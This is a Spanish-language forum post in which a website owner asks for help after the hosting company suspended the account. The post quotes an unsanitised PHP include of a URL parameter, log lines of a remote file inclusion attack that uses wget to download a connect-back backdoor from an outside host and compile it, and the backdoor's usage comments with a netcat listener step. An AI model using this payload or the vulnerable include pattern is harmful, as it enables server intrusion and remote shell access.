Hola,
tengo una pagina web en la cual imprimo .htm en un archivo llamado home.php mediante include:
Código PHP:
<?php include($web); ?>
Mi sorpresa, de cuando pongo mi pagina web y sale que mi cuenta ha sido deshabilitada, yo les pregunto ¿porque?
y me responden esto:
The following files found in /tmp folder belong to user pepe and are used to
create a backdoor on our server
-rwxr-xr-x 1 pepe pepe 13012 May 24 17:04 /tmp/cb*
-rw-r--r-- 1 pepe pepe 1160 Feb 20 2001 /tmp/cb.c
root@bahamas [~]# head -20 /tmp/cb.c
/* Digit-Labs Connect-Back Backdoor
*
* Use this backdoor to access
* machines behind firewalls.
*
* step 1. setup a listening port
* on your box e.g.
* nc -l -p 4000
*
* step 2. Run this file :
* ./cbd <ip_of_listening_machine>
*
* [email protected]
* http://www.digit-labs.org
*
*/
The following lines are from apache log file which clearly states that the file
home.php is vulnerable to attacks. He should get back at me when he has a fix on
this file. Otherwise this will happen again.
212.69.162.21 - - [24/May/2004:17:03:35 -0500] "GET /home.php?web=http://212.69.
162.23/.raar/a&e=wget%20http://212.69.162.23/.raar/cb.c%20-O%20/tmp/cb.c;%20cc%2
0/tmp/cb.c%20-o%20/tmp/cb;ls%20-l%20/tmp HTTP/1.0" 200 179824 "-" "-"
212.69.162.21 - - [24/May/2004:17:04:00 -0500] "GET /home.php?web=http://212.69.
162.23/.raar/a&e=wget%20http://212.69.162.23/.raar/cb.c%20-O%20/tmp/cb.c;%20cc%2
0/tmp/cb.c%20-o%20/tmp/cb;ls%20-l%20/tmp HTTP/1.0" 200 17395 "-" "-"
212.69.162.21 - - [24/May/2004:17:04:13 -0500] "GET /home.php?web=http://212.69.
162.23/.raar/a&e=wget%20http://212.69.162.23/.raar/cb.c%20-O%20/tmp/cb.c;%20cc%2
0/tmp/cb.c%20-o%20/tmp/cb;ls%20-l%20/tmp HTTP/1.0" 200 179918 "-" "-"
Para un codigo de php que tengo y tiene ya vulnerabilidades. ¿alguien me podria ayudar?
Un Saludo.